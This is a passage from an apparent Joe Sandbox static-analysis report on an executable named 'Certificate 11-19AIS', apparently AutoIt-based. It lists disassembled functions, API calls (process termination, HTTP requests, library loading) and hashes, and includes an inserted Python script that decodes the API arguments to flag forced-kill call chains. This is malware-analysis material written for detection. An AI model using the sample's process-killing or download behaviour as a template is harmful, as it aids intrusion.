                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: 29f77901d21eb4bf55cdb89eae537bc676fd77f7d207e0708de2dd8eb3233b68
                                                                              • Instruction ID: ff10aefda7d741d91187bfcc1faa72ee99ea8e944fc7742342526f8e78b4e65a
                                                                              • Opcode Fuzzy Hash: 29f77901d21eb4bf55cdb89eae537bc676fd77f7d207e0708de2dd8eb3233b68
                                                                              • Instruction Fuzzy Hash: F10167B0902B5ABDE3009F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 1423608774-0
                                                                              • Opcode ID: d2283813dc5b59196fe3ca7fea214529dd0f1303764a7dd9e24c7b5c03c177e6
                                                                              • Instruction ID: 9ccad3d96ff4c25eae7376d0a6f20a8ebd28cc3d0cbd53b7c7cd734baafe0973
                                                                              • Opcode Fuzzy Hash: d2283813dc5b59196fe3ca7fea214529dd0f1303764a7dd9e24c7b5c03c177e6
                                                                              • Instruction Fuzzy Hash: B0018632101316ABD7151B54FC48EFB776AFFC87017044829F70392190DB68A810DB51
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007F7C07
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007F7C1D
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 007F7C2C
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C3B
                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C45
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C4C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 57501f2499a4f8918b4ecccd5cd87a33ff8cb2eecb17a8e3e876694d39fb0482
                                                                              • Instruction ID: 3cd9e410f2dd768d56721cee58073dff6f3819e91df219f70afdfb618ca26bae
                                                                              • Opcode Fuzzy Hash: 57501f2499a4f8918b4ecccd5cd87a33ff8cb2eecb17a8e3e876694d39fb0482
                                                                              • Instruction Fuzzy Hash: D1F03A72242258BBE7215BA2AC0EEEF7B7CEFC6B11F000418FA1191151E7A05A41D6B5
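The API listings in this report print every argument as raw hex, so the interesting values (the message number passed to PostMessageW/SendMessageTimeoutW, the access mask handed to OpenProcess, the virtual-key codes fed to MapVirtualKeyW a few functions above) have to be decoded by hand. The following Python is an added example, not part of the Joe Sandbox report: it parses lines in the report's "API.MODULE(args), ref: ADDR" format, resolves the arguments against Windows SDK constants (WM_CLOSE = 0x10, SMTO_ABORTIFHUNG = 0x2, PROCESS_ALL_ACCESS = 0x1F0FFF, the VK_* codes), and flags the close-then-terminate chain visible above (WM_CLOSE, then OpenProcess with PROCESS_ALL_ACCESS, then TerminateProcess). The sample input is constructed by copying lines from this section; the function names and the chain-matching logic are my own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API lines copied from this report's listing format
# (the MapVirtualKeyW function and the PostMessageW..CloseHandle function).
SAMPLE = """\
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 007B281D
• MapVirtualKeyW.USER32(00000010,00000000), ref: 007B2825
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007F7C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007F7C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 007F7C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C4C
"""

# One "API.MODULE(args), ref: ADDR" entry. The argument list is optional because
# the report omits it for some calls (e.g. "GetMenuItemInfoW.USER32 ref: ...").
LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Windows SDK constants used to decode the hex arguments.
WM_CLOSE = 0x10
SMTO_ABORTIFHUNG = 0x0002
PROCESS_ALL_ACCESS = 0x1F0FFF
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


@dataclass
class Call:
    api: str
    module: str
    args: list   # int for hex values, None for '?', str for resolved string literals
    ref: int     # address of the call site


def parse_arg(tok: str):
    if tok == "?":
        return None          # value not known to the static analyzer
    try:
        return int(tok, 16)
    except ValueError:
        return tok           # a resolved string, e.g. DllGetClassObject


def parse_calls(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [parse_arg(t.strip()) for t in (m["args"] or "").split(",") if t.strip()]
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
    return calls


def describe(c: Call) -> str:
    """Render one call with the arguments that matter decoded to SDK names."""
    a = c.args
    if c.api == "MapVirtualKeyW" and a and isinstance(a[0], int):
        return f"{c.api}: vk=0x{a[0]:02X} ({VK_NAMES.get(a[0], 'unknown VK')})"
    if c.api in ("PostMessageW", "SendMessageTimeoutW") and len(a) > 1 and isinstance(a[1], int):
        msg = "WM_CLOSE" if a[1] == WM_CLOSE else f"0x{a[1]:X}"
        extra = ""
        if c.api == "SendMessageTimeoutW" and len(a) > 5 and isinstance(a[4], int) and isinstance(a[5], int):
            flags = "SMTO_ABORTIFHUNG" if a[4] & SMTO_ABORTIFHUNG else f"0x{a[4]:X}"
            extra = f", flags={flags}, timeout={a[5]} ms"
        return f"{c.api}: msg={msg}{extra}"
    if c.api == "OpenProcess" and a and isinstance(a[0], int):
        access = "PROCESS_ALL_ACCESS" if a[0] == PROCESS_ALL_ACCESS else f"0x{a[0]:X}"
        return f"{c.api}: access={access}"
    return c.api


def find_forced_kill(calls: list) -> Optional[tuple]:
    """Return (close_ref, open_ref, kill_ref) when a WM_CLOSE message is followed,
    in listing order, by OpenProcess(PROCESS_ALL_ACCESS) and TerminateProcess:
    ask the window to close, then kill the owning process if it does not."""
    close_ref = open_ref = None
    for c in calls:
        if c.api in ("PostMessageW", "SendMessageTimeoutW") and len(c.args) > 1 and c.args[1] == WM_CLOSE:
            close_ref = close_ref or c.ref
        elif c.api == "OpenProcess" and close_ref and c.args and c.args[0] == PROCESS_ALL_ACCESS:
            open_ref = c.ref
        elif c.api == "TerminateProcess" and open_ref:
            return (close_ref, open_ref, c.ref)
    return None


if __name__ == "__main__":
    calls = parse_calls(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X}  {describe(c)}")
    hit = find_forced_kill(calls)
    if hit:
        print("forced kill chain at", ", ".join(f"{r:08X}" for r in hit))
```

Feed it the whole "APIs" section of a report and it prints one decoded line per call site; the chain matcher only reports when all three steps appear in program order, so a function that merely posts WM_CLOSE, or one that opens a process for a reason other than termination, is not flagged. The listing is static, so the decoded values describe what the code can do, not what it did during the run.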
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 007F9A33
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A44
                                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A51
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A5E
                                                                                • Part of subcall function 007F93D1: CloseHandle.KERNEL32(?,?,007F9A6B,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F93DB
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 007F9A71
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00825DEE,?,?,?,?,?,007BED63), ref: 007F9A78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: ce53c4d3cf54a8b7f928f89cc279310e0eccc9bba0ee70dcc639cff06ef484b5
                                                                              • Instruction ID: ec6ce175f3b5fb522bef07d3f4f1f770f706287700c3a80ae92ff3dfa80c3fdc
                                                                              • Opcode Fuzzy Hash: ce53c4d3cf54a8b7f928f89cc279310e0eccc9bba0ee70dcc639cff06ef484b5
                                                                              • Instruction Fuzzy Hash: C8F08232141311ABD7111BA4FC8DEEB773AFFC4302B140825F703911A1DBB9A811DB51
                                                                              APIs
                                                                                • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
                                                                                • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
                                                                              • __swprintf.LIBCMT ref: 007B1EA6
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007B1D49
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 2125237772-557222456
                                                                              • Opcode ID: 8c537c42450f5edff3f486ab786846bba0a4306c7f3e96775f910dea23429419
                                                                              • Instruction ID: 7450e677f9a359779b8ab691e247d53d7742b23ece826f6816eb9c841bda1fa4
                                                                              • Opcode Fuzzy Hash: 8c537c42450f5edff3f486ab786846bba0a4306c7f3e96775f910dea23429419
                                                                              • Instruction Fuzzy Hash: 01917971108211DFC724EF24C899EAEB7A4FF85700F40492DF985972A2DB78EE45CB92
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0080B006
                                                                              • CharUpperBuffW.USER32(?,?), ref: 0080B115
                                                                              • VariantClear.OLEAUT32(?), ref: 0080B298
                                                                                • Part of subcall function 007F9DC5: VariantInit.OLEAUT32(00000000), ref: 007F9E05
                                                                                • Part of subcall function 007F9DC5: VariantCopy.OLEAUT32(?,?), ref: 007F9E0E
                                                                                • Part of subcall function 007F9DC5: VariantClear.OLEAUT32(?), ref: 007F9E1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4237274167-1221869570
                                                                              • Opcode ID: e21be56a7c018a87e21c1af62b0029fc07506a1ac514f786d319cd918e6ca09e
                                                                              • Instruction ID: 25a2f365c8539050e6ed31ee0e8ecf804798deea1c08bd630bb707365116e1ea
                                                                              • Opcode Fuzzy Hash: e21be56a7c018a87e21c1af62b0029fc07506a1ac514f786d319cd918e6ca09e
                                                                              • Instruction Fuzzy Hash: 08912770608305DFCB50DF24C885A9AB7E4FF89704F04886DF99ADB2A2DB35E905CB52
                                                                              APIs
                                                                                • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                                              • _memset.LIBCMT ref: 007F5438
                                                                              • GetMenuItemInfoW.USER32(?), ref: 007F5467
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007F5513
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007F553D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 4152858687-4108050209
                                                                              • Opcode ID: 53b7dc04e241a97bd610c12c9e812f93a585681482ac70526a72cfb1eef4bf00
                                                                              • Instruction ID: 80577db7551d1494b3a0ba9273ed2ebd403b64b0a455e3debcb40438dd4066c8
                                                                              • Opcode Fuzzy Hash: 53b7dc04e241a97bd610c12c9e812f93a585681482ac70526a72cfb1eef4bf00
                                                                              • Instruction Fuzzy Hash: 925121712087099BD7149B2CC8497BBB7EAEF85364F14062AFB99C3291DB68CC448B52
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007F027B
                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007F02B1
                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007F02C2
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007F0344
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                              • String ID: DllGetClassObject
                                                                              • API String ID: 753597075-1075368562
                                                                              • Opcode ID: 14e7a58a0d13bc8df1bb45820057f27cea04d667840046395fddc1342fe9cea4
                                                                              • Instruction ID: 19cc86e7869acf18b0e9c785b3ad44fec9c50dc66fa275506671ac77c68ebd5b
                                                                              • Opcode Fuzzy Hash: 14e7a58a0d13bc8df1bb45820057f27cea04d667840046395fddc1342fe9cea4
                                                                              • Instruction Fuzzy Hash: 26414DB1600208EFDB15CF64C984BAA7BB9EF45310B1480ADEA09DF306D7B9D944DBE0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F5075
                                                                              • GetMenuItemInfoW.USER32 ref: 007F5091
                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007F50D7
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00871708,00000000), ref: 007F5120
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: e952ad23e6e5c15500f03c2bda545d2abfac0c62c2347103d5c4c04e8c6cf70b
                                                                              • Instruction ID: 8e6de2ea9fae874ecbd15a4d529493ad05808de86f6ca93cace8d261f5b8f535
                                                                              • Opcode Fuzzy Hash: e952ad23e6e5c15500f03c2bda545d2abfac0c62c2347103d5c4c04e8c6cf70b
                                                                              • Instruction Fuzzy Hash: 6641C130208709EFD720DF28D885B6AB7E8AF85324F144A1EFB6597391D774E804CB62
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007FE742
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 007FE768
                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007FE78D
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007FE7B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID: p1ou`Kpu
                                                                              • API String ID: 3321077145-1196383048
                                                                              • Opcode ID: df2d6d68a3395c5b9e0eaa5171e9fed0646d307df86f23d39f8c3b5b1c7a1504
                                                                              • Instruction ID: c94f20bae882a9dc8469fe370ebb30fe2f2bd202db821c77cdcdaea275f91a5c
                                                                              • Opcode Fuzzy Hash: df2d6d68a3395c5b9e0eaa5171e9fed0646d307df86f23d39f8c3b5b1c7a1504
                                                                              • Instruction Fuzzy Hash: 9B415B39200614DFCF11EF15C548A9DBBE5BF99710B098498EA56AB3B2CB38FC00CB91
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00810587
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower
                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                              • API String ID: 2358735015-567219261
                                                                              • Opcode ID: aaee835e220791abf7d79f0db87c5458192e160aa7d49fe1aa0d52ca3e6c03a7
                                                                              • Instruction ID: 38b320593f56c091c1a4c3d02063e7c9dd5891581581b48531269be2fbe4b459
                                                                              • Opcode Fuzzy Hash: aaee835e220791abf7d79f0db87c5458192e160aa7d49fe1aa0d52ca3e6c03a7
                                                                              • Instruction Fuzzy Hash: 45317E7050021AEBCF10EF54CC45AEEB3B8FF55314F108629E826E76D1DBB5A995CB90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007EB88E
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007EB8A1
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 007EB8D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 967c2e589cb66831156908a7bd58c90ad2011b52f0abe841ee9a6b261c9ae7f4
                                                                              • Instruction ID: de1aaacb71d585c74ea594b8bec353269a4742c42656dc46ff8faf93d48fa0b3
                                                                              • Opcode Fuzzy Hash: 967c2e589cb66831156908a7bd58c90ad2011b52f0abe841ee9a6b261c9ae7f4
                                                                              • Instruction Fuzzy Hash: F62104B1901248EFDB04ABA5D88AEFF7B78EF59350B104129F021A62E0DB7C5D1686A0
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00804401
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00804427
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00804457
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0080449E
                                                                                • Part of subcall function 00805052: GetLastError.KERNEL32(?,?,008043CC,00000000,00000000,00000001), ref: 00805067
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 1951874230-3916222277
                                                                              • Opcode ID: ef6c59e47da7e129a88b140d45ded25bc094015c204bf3831b3f9d0a9e979537
                                                                              • Instruction ID: 2544702d6b510d3a0c29fd762b651bec1d9328e39849cc9031ff67e8ba000d5f
                                                                              • Opcode Fuzzy Hash: ef6c59e47da7e129a88b140d45ded25bc094015c204bf3831b3f9d0a9e979537
                                                                              • Instruction Fuzzy Hash: 7321BEF2541A08BEE751AF64DC85EBFB6ECFF88748F10941AF209E2180EA648D059775
                                                                              APIs
                                                                                • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                                                • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                                                • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0081915C
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00819163
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00819178
                                                                              • DestroyWindow.USER32(?), ref: 00819180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
